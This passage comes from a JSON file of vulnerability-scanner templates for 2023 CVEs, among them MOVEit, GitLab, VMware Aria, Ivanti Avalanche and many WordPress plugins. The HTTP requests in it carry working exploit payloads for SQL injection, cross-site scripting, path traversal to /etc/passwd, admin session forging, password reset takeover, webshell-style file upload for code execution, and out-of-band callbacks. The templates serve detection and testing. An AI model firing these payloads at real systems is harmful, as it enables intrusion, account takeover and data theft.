Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: 